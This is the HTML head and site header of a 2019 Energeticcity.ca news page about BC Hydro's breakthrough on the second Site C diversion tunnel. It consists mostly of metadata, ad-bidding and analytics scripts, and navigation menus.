<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <!--<![endif]-->
<head>
<title>BC Hydro makes breakthrough on second diversion tunnel - Energeticcity.ca</title>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="pingback" href="https://www.energeticcity.ca/xmlrpc.php" />
<meta property="og:image" content="https://i0.wp.com/www.energeticcity.ca/wp-content/uploads/2019/07/BC-Hydro-Drill.png?fit=1137%2C633&ssl=1" />

<link rel="canonical" href="https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/" />
<meta property="og:locale" content="en_US" />
<meta property="og:type" content="article" />
<meta property="og:title" content="BC Hydro makes breakthrough on second diversion tunnel - Energeticcity.ca" />
<meta property="og:description" content="FORT ST. JOHN, B.C. &#8211; On Thursday, July 11th, 2019 BC Hydro reached another milestone on the Site C project with the breakthrough on the second diversion tunnel. According to BC Hydro, the diversion tunnel two is about 780 metres long and will eventually be about 11 metres in diameter. The excavation of tunnel two &hellip;" />
<meta property="og:url" content="https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/" />
<meta property="og:site_name" content="Energeticcity.ca" />
<meta property="article:publisher" content="//www.facebook.com/energeticcity" />
<meta property="article:author" content="https://www.facebook.com/energeticcity" />
<meta property="article:section" content="News" />
<meta property="article:published_time" content="2019-07-12T19:53:21+00:00" />
<meta property="fb:app_id" content="132515404077701" />
<meta property="og:image" content="https://i0.wp.com/www.energeticcity.ca/wp-content/uploads/2019/07/BC-Hydro-Drill.png?fit=1137%2C633&#038;ssl=1" />
<meta property="og:image:secure_url" content="https://i0.wp.com/www.energeticcity.ca/wp-content/uploads/2019/07/BC-Hydro-Drill.png?fit=1137%2C633&#038;ssl=1" />
<meta property="og:image:width" content="1137" />
<meta property="og:image:height" content="633" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:description" content="FORT ST. JOHN, B.C. &#8211; On Thursday, July 11th, 2019 BC Hydro reached another milestone on the Site C project with the breakthrough on the second diversion tunnel. According to BC Hydro, the diversion tunnel two is about 780 metres long and will eventually be about 11 metres in diameter. The excavation of tunnel two [&hellip;]" />
<meta name="twitter:title" content="BC Hydro makes breakthrough on second diversion tunnel - Energeticcity.ca" />
<meta name="twitter:site" content="@energeticcity" />
<meta name="twitter:image" content="https://i0.wp.com/www.energeticcity.ca/wp-content/uploads/2019/07/BC-Hydro-Drill.png?fit=1137%2C633&#038;ssl=1" />
<meta name="twitter:creator" content="@energeticcity" />
<script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.energeticcity.ca/#organization","name":"Energeticcity.ca","url":"https://www.energeticcity.ca/","sameAs":["//www.facebook.com/energeticcity","http://Energeticcityfsj","//www.youtube.com/user/energeticcity/","https://twitter.com/energeticcity"],"logo":{"@type":"ImageObject","@id":"https://www.energeticcity.ca/#logo","url":"https://energeticcity.ca/wp-content/uploads/2016/01/energeticcity.png","caption":"Energeticcity.ca"},"image":{"@id":"https://www.energeticcity.ca/#logo"}},{"@type":"WebSite","@id":"https://www.energeticcity.ca/#website","url":"https://www.energeticcity.ca/","name":"Energeticcity.ca","publisher":{"@id":"https://www.energeticcity.ca/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://www.energeticcity.ca/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/#webpage","url":"https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/","inLanguage":"en-US","name":"BC Hydro makes breakthrough on second diversion tunnel - Energeticcity.ca","isPartOf":{"@id":"https://www.energeticcity.ca/#website"},"image":{"@type":"ImageObject","@id":"https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/#primaryimage","url":"https://i0.wp.com/www.energeticcity.ca/wp-content/uploads/2019/07/BC-Hydro-Drill.png?fit=1137%2C633&ssl=1","width":1137,"height":633},"primaryImageOfPage":{"@id":"https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/#primaryimage"},"datePublished":"2019-07-12T19:53:21+00:00","dateModified":"2019-07-12T19:53:21+00:00","breadcrumb":{"@id":"https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/#breadcrumb"}},{"@type":"BreadcrumbList","@id":"https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"item":{"@type":"WebPage","@id":"https://www.energeticcity.ca/","url":"https://www.energeticcity.ca/","name":"Home"}},{"@type":"ListItem","position":2,"item":{"@type":"WebPage","@id":"https://www.energeticcity.ca/news/","url":"https://www.energeticcity.ca/news/","name":"News &#038; Sports"}},{"@type":"ListItem","position":3,"item":{"@type":"WebPage","@id":"https://www.energeticcity.ca/news/","url":"https://www.energeticcity.ca/news/","name":"News"}},{"@type":"ListItem","position":4,"item":{"@type":"WebPage","@id":"https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/","url":"https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/","name":"BC Hydro makes breakthrough on second diversion tunnel"}}]},{"@type":"NewsArticle","@id":"https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/#article","isPartOf":{"@id":"https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/#webpage"},"author":{"@id":"https://www.energeticcity.ca/author/tteves/#author","name":"Tracy Teves"},"publisher":{"@id":"https://www.energeticcity.ca/#organization"},"headline":"BC Hydro makes breakthrough on second diversion tunnel","datePublished":"2019-07-12T19:53:21+00:00","dateModified":"2019-07-12T19:53:21+00:00","commentCount":0,"mainEntityOfPage":"https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/#webpage","image":{"@id":"https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/#primaryimage"},"articleSection":"News","copyrightYear":"2019","copyrightHolder":{"@id":"https://www.energeticcity.ca#organization"}},{"@type":"Person","@id":"https://www.energeticcity.ca/author/tteves/#author","name":"Tracy Teves","image":{"@type":"ImageObject","@id":"https://www.energeticcity.ca/#personlogo","url":"https://www.energeticcity.ca/wp-content/wphb-cache/gravatar/2e3/2e3f3146babeaa0599c8f3306700b9e0x96.jpg","caption":"Tracy Teves"},"sameAs":["https://www.facebook.com/energeticcity","https://twitter.com/https://twitter.com/energeticcity"]}]}</script>

<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel="alternate" type="application/rss+xml" title="Energeticcity.ca &raquo; Feed" href="https://www.energeticcity.ca/feed/" />
<link rel="alternate" type="application/rss+xml" title="Energeticcity.ca &raquo; Comments Feed" href="https://www.energeticcity.ca/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Energeticcity.ca &raquo; BC Hydro makes breakthrough on second diversion tunnel Comments Feed" href="https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/feed/" />
<link rel='stylesheet' id='google-fonts-style-css' href='https://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400%2C400italic%2C600%2C600italic%2C700%7CMontserrat%3A400%7CRoboto%3A300%2C400%2C400italic%2C500%2C500italic%2C700%2C900&#038;ver=9.2.2' type='text/css' media='all' />
<link rel='stylesheet' id='wp-block-library-css' href='https://hb.wpmucdn.com/www.energeticcity.ca/c7c106b2-2380-4755-a6fb-fe08bd05df69.css' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css' href='https://hb.wpmucdn.com/www.energeticcity.ca/3318a0a1-e2a7-4fc2-83b3-f74c2ff06869.css' type='text/css' media='all' />
<link rel='stylesheet' id='td-plugin-multi-purpose-css' href='https://hb.wpmucdn.com/www.energeticcity.ca/7675e041-016e-4c9d-8f48-8d42ec65a5ef.css' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css' href='https://hb.wpmucdn.com/www.energeticcity.ca/3441616f-c19a-4bb0-8e84-417e8b0ebab2.css' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-child-css' href='https://hb.wpmucdn.com/www.energeticcity.ca/4ce8d04b-42d6-4b1a-8fbc-aaed53ec298e.css' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-demo-style-css' href='https://hb.wpmucdn.com/www.energeticcity.ca/5fe2af3f-4377-4bf6-b122-8dbd90c55360.css' type='text/css' media='all' />
<link rel='stylesheet' id='tdb_front_style-css' href='https://hb.wpmucdn.com/www.energeticcity.ca/c82762dc-f249-4467-954c-2250ca92428f.css' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css' href='https://hb.wpmucdn.com/www.energeticcity.ca/96420938-7c70-4e87-b35f-8eec9eb246e7.css' type='text/css' media='all' />
<script>if (document.location.protocol != "https:") {document.location = document.URL.replace(/^http:/i, "https:");}</script><script type='text/javascript'>
/* <![CDATA[ */
var wpgmza_google_api_status = {"message":"Enqueued","code":"ENQUEUED"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.energeticcity.ca/wp-content/plugins/wp-google-maps/wpgmza_data.js'></script>
<script type='text/javascript' src='https://hb.wpmucdn.com/www.energeticcity.ca/4858e9dc-90d7-484e-bfcf-f59636a33452.js'></script>
<script type='text/javascript' src='https://hb.wpmucdn.com/www.energeticcity.ca/f26e15fd-b788-4b56-a4ad-f5ea7d3038e9.js'></script>
<script type='text/javascript' src='https://hb.wpmucdn.com/www.energeticcity.ca/1ea40e7e-2e0b-4d53-bf8e-012fee03fadf.js'></script>
<link rel='https://api.w.org/' href='https://www.energeticcity.ca/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.energeticcity.ca/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.energeticcity.ca/wp-includes/wlwmanifest.xml" />
<meta name="generator" content="WordPress 5.2.2" />
<link rel='shortlink' href='https://www.energeticcity.ca/?p=149514' />
<link rel="alternate" type="application/json+oembed" href="https://www.energeticcity.ca/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.energeticcity.ca%2F2019%2F07%2Fbc-hydro-makes-breakthrough-on-second-diversion-tunnel%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://www.energeticcity.ca/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.energeticcity.ca%2F2019%2F07%2Fbc-hydro-makes-breakthrough-on-second-diversion-tunnel%2F&#038;format=xml" />
<link rel='dns-prefetch' href='//i0.wp.com' />
<link rel='dns-prefetch' href='//i1.wp.com' />
<link rel='dns-prefetch' href='//i2.wp.com' />
<link rel='dns-prefetch' href='//c0.wp.com' />
<style type='text/css'>img#wpstats{display:none}</style> <script>
				window.tdwGlobal = {"adminUrl":"https:\/\/www.energeticcity.ca\/wp-admin\/","wpRestNonce":"8be27121d9","wpRestUrl":"https:\/\/www.energeticcity.ca\/wp-json\/","permalinkStructure":"\/%year%\/%monthnum%\/%postname%\/"};
			</script>
<!--[if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.js"></script><![endif]-->
<link rel="amphtml" href="https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/amp/">

<script>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</script>

<script async src="https://www.googletagmanager.com/gtag/js?id=UA-4715336-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-4715336-1');
</script><link rel="icon" href="https://i2.wp.com/www.energeticcity.ca/wp-content/uploads/2015/12/cropped-iTunesArtwork@2x.png?fit=32%2C32&#038;ssl=1" sizes="32x32" />
<link rel="icon" href="https://i2.wp.com/www.energeticcity.ca/wp-content/uploads/2015/12/cropped-iTunesArtwork@2x.png?fit=192%2C192&#038;ssl=1" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="https://i2.wp.com/www.energeticcity.ca/wp-content/uploads/2015/12/cropped-iTunesArtwork@2x.png?fit=180%2C180&#038;ssl=1" />
<meta name="msapplication-TileImage" content="https://i2.wp.com/www.energeticcity.ca/wp-content/uploads/2015/12/cropped-iTunesArtwork@2x.png?fit=270%2C270&#038;ssl=1" />

<style>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</style>
<style id="tdw-css-placeholder"></style>
<script async='async' src='https://www.googletagservices.com/tag/js/gpt.js'></script>
<script async src="https://www.energeticcity.ca/wp-content/themes/Newspaper9/prebid.js"></script>
<script async src="https://cdn.ad.plus/player/adplus.js"></script>
<script>(function(){var i='vNM72fehPy5_lIzcYm9_-7xdmkMsxj4kuY9pxGPgEh3DxsbSl92h';document.write('<div id="'+i+'"></div>');(playerPro=window.playerPro||[]).push(i);})();</script>
<script data-cfasync="false" type="text/javascript" src="https://static.freeskreen.com/publisher/3419/freeskreen.min.js"></script>
<script>
        	  var PREBID_TIMEOUT = 1000;
            var FAILSAFE_TIMEOUT = 3000;
        
            var googletag = googletag || {};
            googletag.cmd = googletag.cmd || [];

            var pbjs = pbjs || {};
            pbjs.que = pbjs.que || [];

            function initAdserver() {
                if (pbjs.initAdserverSet) return;

                googletag.cmd.push(function() {
                    pbjs.que.push(function() {
                        pbjs.setTargetingForGPTAsync();
                        googletag.pubads().refresh();
                    });
                });

                pbjs.initAdserverSet = true;
            }

            pbjs.que.push(function() {
                var adUnits = [{
                        code: 'div-banner-native-1',
                        mediaTypes: {
                            banner: {
                                sizes: [
                                    [320, 50]
                                ]
                            },
                            native: {
                                type: 'image'
                            },
                        },
                        bids: [{
                            bidder: 'pixfuture-d.openx.net',
                            params: {
                                placementId: 540587150,
                            }
                        }]
                    },
                    {
                        code: 'div-banner-native-2',
                        mediaTypes: {
                            banner: {
                                sizes: [
                                    [728, 90]
                                ]
                            },
                            native: {
                                title: {
                                    required: true
                                },
                                image: {
                                    required: true
                                },
                                sponsoredBy: {
                                    required: true
                                }
                            }
                        },
                        bids: [{
                            bidder: 'OpenX',
                            params: {
                                placementId: 540587149,
                            }
                        }]
                    },
                    {
                        code: 'div-banner-native-3',
                        mediaTypes: {
                            banner: {
                                sizes: [
                                    [300, 250]
                                ]
                            },
                            native: {
                                title: {
                                    required: true
                                },
                                image: {
                                    required: true
                                },
                                sponsoredBy: {
                                    required: true
                                }
                            }
                        },
                        bids: [{
                            bidder: 'OpenX',
                            params: {
                                placementId: 540587146,
                            }
                        }]
                    }
                ];

                pbjs.setConfig({
                    debug: true,
                    cache: {
                        url: false
                    },
                });

                pbjs.addAdUnits(adUnits);
                pbjs.requestBids({
                		timeout: PREBID_TIMEOUT,
                    bidsBackHandler: function(bidResponses) {
                        initAdserver();
                    }
                });
            });
            
            // in case PBJS doesn't load
            setTimeout(initAdserver, FAILSAFE_TIMEOUT);

        </script>
<script>
            googletag.cmd.push(function() {
                googletag
                    .defineSlot(
                        '/19968336/prebid_multiformat_test', [
                            [320, 50],
                            [360, 360]
                        ],
                        'div-banner-native-1'
                    )
                    .addService(googletag.pubads());

                googletag
                    .defineSlot(
                        '/19968336/prebid_multiformat_test', [
                            [728, 90],
                            [360, 360]
                        ],
                        'div-banner-native-2'
                    )
                    .addService(googletag.pubads());

                googletag
                    .defineSlot(
                        '/19968336/prebid_multiformat_test', [
                            [300, 250],
                            [360, 360]
                        ],
                        'div-banner-native-3'
                    )
                    .addService(googletag.pubads());

                googletag.pubads().disableInitialLoad();
                googletag.pubads().enableSingleRequest();
                googletag.enableServices();
            });

        </script>
<script type="application/javascript">var googletag=googletag||{};googletag.cmd=googletag.cmd||[];googletag.cmd.push(function(){googletag.pubads().disableInitialLoad()});</script><script type="application/javascript" src="//ap.lijit.com/www/headerauction/headersuite.min.js?configId=2750"></script>
<script>
  var googletag = googletag || {};
  googletag.cmd = googletag.cmd || [];
</script>
<script>
  googletag.cmd.push(function() {
    googletag.defineSlot('/1275485/PRRD-Static', [300, 250], 'div-gpt-ad-1542379461361-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/PRRD-Static-Mobile', [300, 250], 'div-gpt-ad-1548986864458-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/newsletter_sponsor', [300, 50], 'div-gpt-ad-1548989049121-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/story_ad_2', [300, 250], 'div-gpt-ad-1556498117584-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/story_ad_3', [300, 250], 'div-gpt-ad-1556498228584-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/CV-Desktop', [300, 250], 'div-gpt-ad-1546012712555-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/CV-Mobile', [320, 50], 'div-gpt-ad-1546187469510-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/desktop_top_banner', [728, 90], 'div-gpt-ad-1548958164054-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/desktop_box_1', [300, 250], 'div-gpt-ad-1548958187631-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/desktop_box_2', [300, 250], 'div-gpt-ad-1548958200546-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/desktop_box_3', [300, 250], 'div-gpt-ad-1548958217123-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/desktop_box_4', [300, 250], 'div-gpt-ad-1548958233114-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/desktop_box_5', [300, 250], 'div-gpt-ad-1548958254077-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/desktop_box_6', [300, 250], 'div-gpt-ad-1548958270663-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/desktop_box_7', [300, 250], 'div-gpt-ad-1548958286357-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/desktop_box_8', [300, 250], 'div-gpt-ad-1548958474676-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/desktop_box_9', [300, 250], 'div-gpt-ad-1548958501599-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/desktop_bottom_banner', [728, 90], 'div-gpt-ad-1548958315111-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/story_ad', [300, 250], 'div-gpt-ad-1548958409608-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/desktop_below_story', [300, 250], 'div-gpt-ad-1548958444786-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/mobile_top_box', [300, 250], 'div-gpt-ad-1548958543195-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/mobile_below_story', [300, 250], 'div-gpt-ad-1548958573620-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/mobile_below_story_2', [300, 250], 'div-gpt-ad-1548958590036-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/mobile_front_page_top_box', [300, 250], 'div-gpt-ad-1548958617253-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/mobile_front_page_box_1', [300, 250], 'div-gpt-ad-1548958639655-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/mobile_front_page_box_2', [300, 250], 'div-gpt-ad-1548958652924-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/mobile_front_page_box_3', [300, 250], 'div-gpt-ad-1548958670117-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/mobile_front_page_box_4', [300, 250], 'div-gpt-ad-1548958688584-0').addService(googletag.pubads());
    googletag.defineSlot('/1275485/video_300x250', [300, 250], 'div-gpt-ad-1549064611810-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.pubads().disableInitialLoad();
    googletag.enableServices();
  });
</script>
<script type="text/javascript" async="async" src="https://widgets.outbrain.com/outbrain.js"></script>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-6663742226541248",
          enable_page_level_ads: true
     });
</script>
<script>
//load the apstag.js library
!function(a9,a,p,s,t,A,g){if(a[a9])return;function q(c,r){a[a9]._Q.push([c,r])}a[a9]={init:function(){q("i",arguments)},fetchBids:function(){q("f",arguments)},setDisplayBids:function(){},targetingKeys:function(){return[]},_Q:[]};A=p.createElement(s);A.async=!0;A.src=t;g=p.getElementsByTagName(s)[0];g.parentNode.insertBefore(A,g)}("apstag",window,document,"script","//c.amazon-adsystem.com/aax2/apstag.js");

//initialize the apstag.js library on the page to allow bidding
apstag.init({
     pubID: '0ce7666b-1d84-4f63-91fc-d1060feaed8b', //enter your pub ID here as shown above, it must within quotes
     adServer: 'googletag',
     simplerGPT: true
});
googletag.cmd.push(function(){
apstag.fetchBids({     
    timeout: 2e3
}, function(bids) {
     // set apstag targeting on googletag, then trigger the first DFP request in googletag's disableInitialLoad integration
    
         apstag.setDisplayBids();
         googletag.pubads().refresh();
     });
}); 
</script>
</head>
<body data-rsssl=1 class="post-template-default single single-post postid-149514 single-format-standard tdm-menu-active-style2 bc-hydro-makes-breakthrough-on-second-diversion-tunnel global-block-template-1 td-local-news tdb_template_132213 td-animation-stack-type1 td-boxed-layout" itemscope="itemscope" itemtype="https://schema.org/WebPage">
<div class="td-scroll-up"><i class="td-icon-menu-up"></i></div>
<div class="td-menu-background"></div>
<div id="td-mobile-nav">
<div class="td-mobile-container">

<div class="td-menu-socials-wrap">

<div class="td-menu-socials">
<span class="td-social-icon-wrap">
<a target="_blank" href="https://www.facebook.com/energeticcity" title="Facebook">
<i class="td-icon-font td-icon-facebook"></i>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="https://www.energeticcity.ca/feed" title="RSS">
<i class="td-icon-font td-icon-rss"></i>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="https://www.twitter.com/energeticcity" title="Twitter">
<i class="td-icon-font td-icon-twitter"></i>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="https://www.youtube.com/channel/UCkQEKWQr_hVV4ta10oZRUhA" title="Youtube">
<i class="td-icon-font td-icon-youtube"></i>
</a>
</span> </div>

<div class="td-mobile-close">
<a href="#"><i class="td-icon-close-mobile"></i></a>
</div>
</div>


<div class="td-mobile-content">
<div class="menu-website-menu-container"><ul id="menu-website-menu" class="td-mobile-main-menu"><li id="menu-item-122999" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first menu-item-122999"><a href="https://www.energeticcity.ca/">Home</a></li>
<li id="menu-item-123000" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-123000"><a href="https://www.energeticcity.ca/news/">News<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
<li id="menu-item-134529" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-134529"><a href="https://www.energeticcity.ca/2018-municipal-election/">2018 Municipal Election</a></li>
<li id="menu-item-133514" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-133514"><a href="https://www.energeticcity.ca/cat-energy/">Energy News</a></li>
<li id="menu-item-133515" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-133515"><a href="https://www.energeticcity.ca/site-c/">Site C</a></li>
<li id="menu-item-128306" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-128306"><a href="https://www.energeticcity.ca/forest-fires/">Forest Fires</a></li>
</ul>
</li>
<li id="menu-item-134079" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-134079"><a href="https://www.energeticcity.ca/news/landslide/">Landslide</a></li>
<li id="menu-item-123001" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-123001"><a href="https://www.energeticcity.ca/sports/">Sports</a></li>
<li id="menu-item-123003" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-123003"><a href="https://www.energeticcity.ca/townwall-events/">Events</a></li>
<li id="menu-item-123004" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-123004"><a href="https://regionalhelpwanted.com/fort-st-john-british-columbia-jobs/">Jobs<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
<li id="menu-item-130138" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-130138"><a href="https://www.energeticcity.ca/get-moose-fm-energeticcity-ca-working-for-you/">Looking for Employees?</a></li>
</ul>
</li>
<li id="menu-item-123005" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-123005"><a href="http://www.moosefm.ca">Moose FM</a></li>
<li id="menu-item-123006" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-123006"><a href="https://www.landmarkcinemas.com/showtimes/fort-st-john">Movies</a></li>
<li id="menu-item-131428" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-131428"><a href="http://fortstjohnadvertising.ca/">Advertise</a></li>
<li id="menu-item-123008" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-123008"><a href="https://www.energeticcity.ca/news-tip/">News Tip</a></li>
</ul></div> </div>
</div>

</div> <div class="td-search-background"></div>
<div class="td-search-wrap-mob">
<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
<form method="get" class="td-search-form" action="https://www.energeticcity.ca/">

<div class="td-search-close">
<a href="#"><i class="td-icon-close-mobile"></i></a>
</div>
<div role="search" class="td-search-input">
<span>Search</span>
<input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off" />
</div>
</form>
<div id="td-aj-search-mob"></div>
</div>
</div>
<div id="td-outer-wrap" class="td-theme-wrap">

<div class="td-header-wrap td-header-style-1 ">
<div class="td-header-top-menu-full td-container-wrap ">
<div class="td-container td-header-row td-header-top-menu">
<div class="top-bar-style-mp-1">
<div class="td-header-sp-top-widget">
<span class="td-social-icon-wrap">
<a target="_blank" href="https://www.facebook.com/energeticcity" title="Facebook">
<i class="td-icon-font td-icon-facebook"></i>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="https://www.energeticcity.ca/feed" title="RSS">
<i class="td-icon-font td-icon-rss"></i>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="https://www.twitter.com/energeticcity" title="Twitter">
<i class="td-icon-font td-icon-twitter"></i>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="https://www.youtube.com/channel/UCkQEKWQr_hVV4ta10oZRUhA" title="Youtube">
<i class="td-icon-font td-icon-youtube"></i>
</a>
</span> </div>
<div class="td-header-sp-top-menu">
 <div class="td-weather-top-widget" id="td_top_weather_uid">
<i class="td-icons mist-d"></i>
<div class="td-weather-now" data-block-uid="td_top_weather_uid">
<span class="td-big-degrees">23</span>
<span class="td-weather-unit">C</span>
</div>
<div class="td-weather-header">
<div class="td-weather-city">Fort St. John</div>
</div>
</div>
<div class="td_data_time">
<div style="visibility:hidden;">
Friday, July 12, 2019
</div>
</div>
</div>
<div class="td-header-sp-phone">
<span>Tel:</span> <a href="tel:250-787-7100">250-787-7100</a> </div>
<div class="td-header-sp-email">
<span>Email:</span> <a href="/cdn-cgi/l/email-protection#791a16170d181a0d391c171c0b1e1c0d101a1a100d00571a18"><span class="__cf_email__" data-cfemail="98fbf7f6ecf9fbecd8fdf6fdeafffdecf1fbfbf1ece1b6fbf9">[email&#160;protected]</span></a> </div>
<div class="td-header-sp-info">
9924 101 ave Fort St. John, B.C. </div>
</div>

</div>
</div>
<div class="td-banner-wrap-full td-logo-wrap-full td-container-wrap ">
<div class="td-container td-header-row td-header-header">
<div class="td-header-sp-logo">
<a class="td-main-logo" href="https://www.energeticcity.ca/">
<img class="td-retina-data" data-retina="//energeticcity.ca/wp-content/uploads/2018/01/ENC-black-544-180.png" src="//energeticcity.ca/wp-content/uploads/2018/01/ENC-black-272-90.png" alt="Energeticcity.ca - Everything Fort St. John" />
<span class="td-visual-hidden">Energeticcity.ca</span>
</a>
</div>
<div class="td-header-sp-recs">
<div class="td-header-rec-wrap">
<div class="td-a-rec td-a-rec-id-header  td-rec-hide-on-tp td-rec-hide-on-p td_uid_1_5d28fc08be638_rand td_block_template_1"><span class="td-adspot-title">Advertisement</span>
<div id='div-gpt-ad-1548958164054-0' style='height:90px; width:728px;'>
<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1548958164054-0'); });
</script>
</div></div>
</div> </div>
</div>
</div>
<div class="td-header-menu-wrap-full td-container-wrap ">
<div class="td-header-menu-wrap td-header-gradient ">
<div class="td-container td-header-row td-header-main-menu">
<div id="td-header-menu" role="navigation">
<div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
<div class="td-main-menu-logo td-logo-in-header">
<a class="td-mobile-logo td-sticky-mobile" href="https://www.energeticcity.ca/">
<img class="td-retina-data" data-retina="https://www.energeticcity.ca/wp-content/uploads/2018/03/Energeticcity-logo-white-mobile-280x96.png" src="https://www.energeticcity.ca/wp-content/uploads/2018/03/Energeticcity-logo-white-mobile-140x48.png" alt="Energeticcity.ca - Everything Fort St. John" />
</a>
<a class="td-header-logo td-sticky-mobile" href="https://www.energeticcity.ca/">
<img class="td-retina-data" data-retina="//energeticcity.ca/wp-content/uploads/2018/01/ENC-black-544-180.png" src="//energeticcity.ca/wp-content/uploads/2018/01/ENC-black-272-90.png" alt="Energeticcity.ca - Everything Fort St. John" />
</a>
</div>
